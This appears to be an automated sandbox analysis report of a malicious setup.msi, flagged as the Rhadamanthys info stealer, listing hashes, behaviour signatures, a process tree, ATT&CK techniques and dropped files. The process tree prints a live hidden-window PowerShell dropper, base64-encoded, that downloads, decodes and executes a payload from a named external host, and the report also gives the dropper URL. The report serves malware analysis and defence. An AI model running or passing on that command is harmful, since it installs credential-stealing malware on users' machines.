Analysis

  • max time kernel
    141s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-06-2024 14:15

General

  • Target

    setup.msi

  • Size

    25.2MB

  • MD5

    be2a13cfa57db16d3f654c5e444c360b

  • SHA1

    7f45d2a4debbbca678cc5c300c59af01ca197bca

  • SHA256

    b086cb6063a6fe194342b3dbe7639aebab02513305c95a914d052e87b54e0523

  • SHA512

    978f4fb1e9df0785bbcd2734d4a7b32d3acab4a215075f0860ccc879bf65714e2c6eabba41ee7c38c0394a9a08b60757544034b21c336c2a3f233a411744953e

  • SSDEEP

    786432:++aMGdE4CF4EgcHxa3pS58g0nfZ3AOnr:++aMGrCKEg+xwS5MGOr

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://gotry-gotry.com/2306s1.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 16 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2536
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:848
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
      1⤵
      • Enumerates connected drives
      • Event Triggered Execution: Installer Packages
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3592
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4472
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding D4D583FB9DECCDDEB28171C38814F918
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:3636
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"
        2⤵
        • Executes dropped EXE
        PID:116
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3128
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2744
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AZwBvAHQAcgB5AC0AZwBvAHQAcgB5AC4AYwBvAG0ALwAyADMAMAA2AHMAMQAuAGIAcwA2ADQAIgApADsAWwBCAHkAdABlAFsAXQBdACAAJAB4AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAcwAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACIAYgAiACkALgBSAGUAcABsAGEAYwBlACgAIgBAACIALAAiAGgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJAAiACwAIgBtACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACUAIgAsACIAcAAiACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAiAHYAIgApACkAOwBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeAAuAEMAbwB1AG4AdAA7ACQAaQArACsAKQB7ACQAeABbACQAaQBdAD0AIAAoACQAeABbACQAaQBdACAALQBiAHgAbwByACAAMQA2ADcAKQAgAC0AYgB4AG8AcgAgADEAOAB9ADsAaQBlAHgAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHgAKQApAA==
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2752
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1776
            4⤵
            • Program crash
            PID:5036
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1764
            4⤵
            • Program crash
            PID:556
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1748
            4⤵
            • Program crash
            PID:3236
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2744 -ip 2744
      1⤵
        PID:1540
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 2744 -ip 2744
        1⤵
          PID:4100
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2744 -ip 2744
          1⤵
            PID:232

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Privilege Escalation

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e5747ab.rbs
            Filesize

            22KB

            MD5

            5439059e577487b5d3948d06468ce02a

            SHA1

            2d5f9b6cba05d853c2b802ede01c9c394792baa1

            SHA256

            e780d52c88179242bd3f52a7f2d267a7fccb7c34942dea00723efb4c7ebbc768

            SHA512

            2eb2df843d9f16341c78ee41622c2415aa26405c688742e06d80f40d5ad2ea772657ab36eeb5bfbffdcfd4505901577d80f5b60b5e3b0d16260ee31f13981364

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qgapclbi.jsz.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
            Filesize

            494KB

            MD5

            98ccd44353f7bc5bad1bc6ba9ae0cd68

            SHA1

            76a4e5bf8d298800c886d29f85ee629e7726052d

            SHA256

            e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

            SHA512

            d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar
            Filesize

            378KB

            MD5

            35af121e2e55c85b99cb7daf396fb523

            SHA1

            f2b073afafa04d96f0bc191e280ac3b658afb404

            SHA256

            c64353f1e6327254ba4813d246e591f435a6f599bff9f8deb303557a73cd4257

            SHA512

            24bbaa40c6c5c349dabb9c132fbf1113bc0d8116bf97229ad275d198ae05505699a9f33f9926d2147a6a036f849b928970f18aad6e8837c82f5dcc23cb28dcb0

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
            Filesize

            639KB

            MD5

            fd3ce044ac234fdab3df9d7f492c470a

            SHA1

            a74a287d5d82a8071ab36c72b2786342d83a8ef7

            SHA256

            0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba

            SHA512

            86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\tier0_s64.dll
            Filesize

            386KB

            MD5

            7e60404cfb232a1d3708a9892d020e84

            SHA1

            31328d887bee17641608252fb2f9cd6caf8ba522

            SHA256

            5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766

            SHA512

            4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\vstdlib_s64.dll
            Filesize

            1004KB

            MD5

            21c2ecd34eef7e95016e43fffd704d22

            SHA1

            5cc5a0305866cca388a80b9f060289c00c5ffc44

            SHA256

            00fd5db000b6b591e4a843351f31216ddc120d0c417c7174d67027d65f7e9bfc

            SHA512

            0738b4f562725425f1623b898ce7f744893ca979b492fc6ea4967b01f52386103a4b812a089a17b10bb06cf9da1cd38874e308013c27cd6ad484fe2f1a89b331

          • C:\Windows\Installer\MSI4815.tmp
            Filesize

            738KB

            MD5

            b158d8d605571ea47a238df5ab43dfaa

            SHA1

            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

            SHA256

            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

            SHA512

            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

          • C:\Windows\Installer\MSI49AF.tmp
            Filesize

            1.1MB

            MD5

            1a2b237796742c26b11a008d0b175e29

            SHA1

            cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

            SHA256

            81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

            SHA512

            3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

          • C:\Windows\Installer\MSI62B8.tmp
            Filesize

            364KB

            MD5

            54d74546c6afe67b3d118c3c477c159a

            SHA1

            957f08beb7e27e657cd83d8ee50388b887935fae

            SHA256

            f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

            SHA512

            d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

          • C:\Windows\Installer\e5747a8.msi
            Filesize

            25.2MB

            MD5

            be2a13cfa57db16d3f654c5e444c360b

            SHA1

            7f45d2a4debbbca678cc5c300c59af01ca197bca

            SHA256

            b086cb6063a6fe194342b3dbe7639aebab02513305c95a914d052e87b54e0523

            SHA512

            978f4fb1e9df0785bbcd2734d4a7b32d3acab4a215075f0860ccc879bf65714e2c6eabba41ee7c38c0394a9a08b60757544034b21c336c2a3f233a411744953e

          • memory/848-182-0x0000000000490000-0x0000000000499000-memory.dmp
            Filesize

            36KB

          • memory/848-185-0x00007FFC573B0000-0x00007FFC575A5000-memory.dmp
            Filesize

            2.0MB

          • memory/848-187-0x0000000075E90000-0x00000000760A5000-memory.dmp
            Filesize

            2.1MB

          • memory/848-184-0x0000000002520000-0x0000000002920000-memory.dmp
            Filesize

            4.0MB

          • memory/2744-152-0x0000000000380000-0x00000000003A8000-memory.dmp
            Filesize

            160KB

          • memory/2744-177-0x0000000004D70000-0x0000000005170000-memory.dmp
            Filesize

            4.0MB

          • memory/2744-178-0x0000000004D70000-0x0000000005170000-memory.dmp
            Filesize

            4.0MB

          • memory/2744-179-0x00007FFC573B0000-0x00007FFC575A5000-memory.dmp
            Filesize

            2.0MB

          • memory/2744-154-0x0000000000380000-0x00000000003A8000-memory.dmp
            Filesize

            160KB

          • memory/2744-153-0x0000000000380000-0x00000000003A8000-memory.dmp
            Filesize

            160KB

          • memory/2744-181-0x0000000075E90000-0x00000000760A5000-memory.dmp
            Filesize

            2.1MB

          • memory/2752-161-0x000001A67F7C0000-0x000001A67F7E2000-memory.dmp
            Filesize

            136KB

          • memory/2752-188-0x000001A67F7F0000-0x000001A67F80C000-memory.dmp
            Filesize

            112KB

          • memory/2752-223-0x000001A67FDF0000-0x000001A67FFB2000-memory.dmp
            Filesize

            1.8MB

          • memory/2752-224-0x000001A61ABF0000-0x000001A61B118000-memory.dmp
            Filesize

            5.2MB

          • memory/3128-148-0x000001A943FE0000-0x000001A943FE1000-memory.dmp
            Filesize

            4KB